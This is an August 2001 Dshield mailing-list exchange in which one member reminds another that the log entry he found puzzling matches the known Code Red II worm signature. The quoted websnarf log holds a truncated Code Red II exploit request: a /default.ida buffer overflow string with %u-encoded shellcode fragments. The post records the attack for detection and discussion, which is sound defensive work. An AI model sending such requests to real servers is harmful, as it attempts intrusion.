[Dshield] Strange Worm !

scott@advancedtool.com scott at advancedtool.com
Wed Aug 8 14:07:00 GMT 2001


Ok, I don't mean for this to be a flame, but a real live observation.

Anyone participating in this list in the last say 24-72 hours should 
be intimately familiar with the signature of the Code Red II worm 
contact.

Am I totally off base here?

--Scott

On 8 Aug 2001, at 6:50, johnr wrote:

> hi everyone,
> 
> i'm running websnarf, a fake webserver to get the ip's of the worm-
> infected systems .. strange but the last one was just trying to attack
> me 4 times (!) now ... here's my log :
> 
> $ websnarf v1.04 listening on port 80 (timeout=1 secs)
> 195.178.171.84 - - [08/Aug/2001:04:45:29 -0000] "GET
> /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XX XXXXXXXXXXXXXXXXXX%u9090%u68
> 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
> 90 90%u8190%u00c3%u0003%u8b00%u 531b%u53ff%u0078%u0000%u00=a 
*snip*